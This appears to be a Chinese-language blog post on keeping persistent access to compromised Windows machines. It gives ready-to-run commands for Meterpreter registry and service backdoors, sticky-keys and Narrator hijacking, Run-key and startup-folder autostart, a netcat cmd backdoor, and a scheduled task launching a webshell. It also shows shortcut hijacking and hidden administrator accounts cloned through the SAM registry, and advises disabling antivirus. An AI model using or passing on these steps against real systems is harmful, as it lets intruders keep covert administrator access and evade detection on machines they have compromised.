您现在的位置是：首页 >技术杂谈 >WINDOWS权限维持网站首页技术杂谈

Meterpreter权限维持

meterpreter中的权限维持技术有两种：

• persistence（注册表后门）
• metsvc的后门（服务后门）

1、注册表后门

windows/local/persistence

这个方法是执行vbs脚本，这里很容易被杀软拦截，在实验操作的时候需要将杀毒软件关掉

2、服务后门

进入meterpreter后

run metsvc -A

系统工具替换后门

这里主要是利用修改注册表，点击从而达到shell上线的作用

有以下几种类型：

• 劫持Narrator讲述人
• 辅助工具劫持
• shift后门（sethc)
• 劫持notepad

使用msf的话可以使用以下模块

post/windows/manage/sticky_keys

开机自启动/注册表项

每次登录都会按顺序自动执行

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

HKEY_ CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorerRun

RunOnce

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce

RunServicesOnce

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServiceOnce

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServiceOnce

拓展：

HKEY_LOCAL_MACHINE所有用户有效，HKEY_CURRENT_USER仅在当前用户有效

使用nc后门

上传nc，写入注册表开机自启，将cmd给出去留个后门，更改防火墙规则，允许后门端口开放。

Others

schtasks计划任务

创建一个计划任务，每天早上九点开始执行 shell，这里的SC参数是频率的的意思

SCHTASKS /Create /TN calc /TR C:windowssystem32webshell.exe /SC DAILY /ST 09:00

快捷方式劫持

这里可以将计算器路径换为自己的shell后门，这里还需要更换图标，这里稍微有一点缺陷就是会弹出一个黑框框

C:windowssystem32WindowsPowerShellv1.0powershell.exe -WindowStyle Hidden -c "invoke-item  'C:Program Files (x86)Mozilla Firefoxfirefox.exe'; invoke-item C:Windowssystem32calc.exe"

 账户隐藏

 隐藏用户：

net user hack$ hjw123 /add && net localgroup administrators administrator /add

这个方法可以在管理用户中看见

激活Guest用户：

net user guest hjw123 && net localgroup administrators guest /add
net user guest /active:yes

后门账户

创建用户

net user hack$ hjw123 /add /y        //这里y参数是默认指令进行

添加管理员组

net localgroup administrators hack$ /add

添加远程连接组

net localgroup "remote desktop users" hack$ /add

我们进入注册表

计算机HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers

我们导出name中的hack$的注册表，然后导出上面对应的文件夹的注册表

另外我们还要导出Administrator的注册表

将administrator的"F"值复制给hack的"F"，下面是我已经替换好的 

删除hack$账户

net user  hack$  /del

然后导入刚才的注册表，先导入名字，后导入值

regedit  /s  hackname.reg
regedit  /s  hack.reg

这时候就可以发现管理账户中已经没有hack$用户了

远程连接用户的使用使用hack$来连接

文件夹启动

在每次开机或重启的时候都会运行启动文件夹下的程序

C:Users{UserName}AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp

服务后门

重启容易被杀毒软件拦截

sc create [ServerName] binPath="绝对路径"

Taks-Powershell

powershell定时任务脚本